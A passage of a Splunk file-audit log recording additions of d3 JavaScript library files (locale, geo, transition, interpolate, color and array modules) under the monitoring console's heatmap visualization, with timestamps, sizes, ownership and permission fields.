action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/ko-KR.js", isdir=0, size=625, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.983, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/ja-JP.js", isdir=0, size=643, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.980, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/it-IT.js", isdir=0, size=636, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.976, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/hu-HU.js", isdir=0, size=669, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.970, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/he-IL.js", isdir=0, size=734, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.966, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/fr-FR.js", isdir=0, size=650, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.961, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/fr-CA.js", isdir=0, size=609, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.957, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/fi-FI.js", isdir=0, size=681, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.952, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/es-ES.js", isdir=0, size=624, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.947, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/en-US.js", isdir=0, size=610, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/en-GB.js", isdir=0, size=611, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.938, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/en-CA.js", isdir=0, size=610, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.933, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/de-DE.js", isdir=0, size=624, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.929, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/de-CH.js", isdir=0, size=624, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.923, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale/ca-ES.js", isdir=0, size=634, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.716, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/transverse-mercator.js", isdir=0, size=823, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.712, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/transform.js", isdir=0, size=1023, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.706, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/stream.js", isdir=0, size=2514, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.701, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/stereographic.js", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.697, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/spherical.js", isdir=0, size=280, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.692, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/rotation.js", isdir=0, size=2351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.688, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/resample.js", isdir=0, size=3232, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.683, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/projection.js", isdir=0, size=3463, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.679, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/point-in-polygon.js", isdir=0, size=2480, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.674, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/path.js", isdir=0, size=2939, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.670, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/path-context.js", isdir=0, size=1027, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.666, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/path-centroid.js", isdir=0, size=2171, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.662, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/path-buffer.js", isdir=0, size=1345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.658, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/path-bounds.js", isdir=0, size=543, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.654, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/path-area.js", isdir=0, size=1041, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.648, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/orthographic.js", isdir=0, size=259, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.644, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/mercator.js", isdir=0, size=1175, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.640, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/length.js", isdir=0, size=1175, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.636, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/interpolate.js", isdir=0, size=1068, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.632, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/index.js", isdir=0, size=703, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/greatArc.js", isdir=0, size=1042, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.625, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/graticule.js", isdir=0, size=3028, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.621, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/gnomonic.js", isdir=0, size=266, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/geo.js", isdir=0, size=13, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/equirectangular.js", isdir=0, size=256, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/distance.js", isdir=0, size=581, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.603, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/conic.js", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.599, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/conic-equidistant.js", isdir=0, size=817, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.595, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/conic-equal-area.js", isdir=0, size=755, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.591, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/conic-conformal.js", isdir=0, size=1055, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.585, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/compose.js", isdir=0, size=250, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.580, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/clip.js", isdir=0, size=4267, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.576, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/clip-polygon.js", isdir=0, size=3056, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.571, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/clip-extent.js", isdir=0, size=5483, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.567, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/clip-circle.js", isdir=0, size=5883, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.561, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/clip-antimeridian.js", isdir=0, size=2882, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.557, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/circle.js", isdir=0, size=2276, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.552, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/centroid.js", isdir=0, size=4691, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.548, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/cartesian.js", isdir=0, size=889, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.543, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/bounds.js", isdir=0, size=4841, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.539, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/azimuthal.js", isdir=0, size=561, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.534, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/azimuthal-equidistant.js", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.528, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/azimuthal-equal-area.js", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.523, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/area.js", isdir=0, size=2045, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.517, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/albers.js", isdir=0, size=224, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo/albers-usa.js", isdir=0, size=3903, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.107, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/tween.js", isdir=0, size=767, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.103, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/transition.js", isdir=0, size=4036, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.098, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/text.js", isdir=0, size=268, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.094, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/subtransition.js", isdir=0, size=714, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.071, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/style.js", isdir=0, size=1998, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.067, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/selectAll.js", isdir=0, size=843, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.062, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/select.js", isdir=0, size=771, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.055, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/remove.js", isdir=0, size=238, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.049, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/index.js", isdir=0, size=21, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.044, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/filter.js", isdir=0, size=579, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.039, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/ease.js", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.035, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/each.js", isdir=0, size=796, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.031, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/duration.js", isdir=0, size=471, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.026, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/delay.js", isdir=0, size=435, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:07.020, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition/attr.js", isdir=0, size=2046, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.814, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/zoom.js", isdir=0, size=1200, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.807, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/uninterpolate.js", isdir=0, size=262, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.801, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/transform.js", isdir=0, size=2078, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.793, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/string.js", isdir=0, size=1881, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.788, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/round.js", isdir=0, size=149, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.784, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/rgb.js", isdir=0, size=428, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.779, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/object.js", isdir=0, size=406, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/number.js", isdir=0, size=158, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.770, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/lab.js", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.765, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/interpolate.js", isdir=0, size=713, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.761, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/index.js", isdir=0, size=235, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.755, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/hsl.js", isdir=0, size=525, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.751, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/hcl.js", isdir=0, size=525, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/ease.js", isdir=0, size=2583, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.740, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate/array.js", isdir=0, size=446, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.634, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color/xyz.js", isdir=0, size=217, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.630, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color/rgb.js", isdir=0, size=7536, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.626, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color/lab.js", isdir=0, size=1676, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.621, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color/index.js", isdir=0, size=86, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color/hsl.js", isdir=0, size=1429, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color/hcl.js", isdir=0, size=1032, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color/color.js", isdir=0, size=118, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.503, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/zip.js", isdir=0, size=80, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.499, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/variance.js", isdir=0, size=561, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.493, user=n/a, 